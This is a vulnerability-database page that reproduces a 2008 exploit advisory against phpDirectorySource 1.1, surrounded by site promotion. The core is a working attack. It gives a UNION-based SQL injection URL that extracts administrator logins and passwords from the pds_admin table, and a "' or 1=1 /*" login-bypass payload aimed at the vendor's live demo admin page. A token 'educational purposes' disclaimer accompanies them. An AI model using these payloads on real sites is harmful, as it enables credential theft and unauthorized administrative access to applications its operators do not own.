Lucene search

K

phpdirsource-sql.txt

🗓️ 05 May 2008 00:00:00Reported by InjEctOrSType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

SQL Injection, Admin Login Bypass in phpDirectorySource 1.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
| _ __ __ __ ______ |  
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |  
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |  
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |  
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |  
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |  
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |  
| \ \____/ >> Kings of injection |  
| \/___/ |  
| |  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|  
  
Title :: SQL Injection and Bypass Administrator Login  
  
  
Author :: InjEctOr [s0f (at) w.cn]  
  
&& FishEr762 [sq7 (at) w.cn]  
  
  
Application :: phpDirectorySource 1.1  
  
Download :: http://www.phpdirectorysource.com/files/pds_ver1_1.zip  
  
Dork 1 :: use your mind :p  
  
  
Greets :: Allah , TrYaG TeaM & Muslims Hackers   
  
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.  
  
  
  
--------------------------------------------[C o n t e x t]-----------------------------------------  
  
  
Expl0!te ::  
  
http://127.0.0.1/[script]/show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*  
  
  
i.e.  
http://directory.xxx.com/show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*  
  
note:   
used "and 1=0" koz lid is varchar so it's better way to make next query run  
  
--------------  
  
Bypass Administrator Login :  
/directory/admin.php  
  
username field  
' or 1=1 /*  
  
i.e. in demo site (demos always get the 1st shot lol)  
http://www.phpdirectorysource.com/directory/admin.php  
  
  
-------------------------------------------[End of context]----------------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report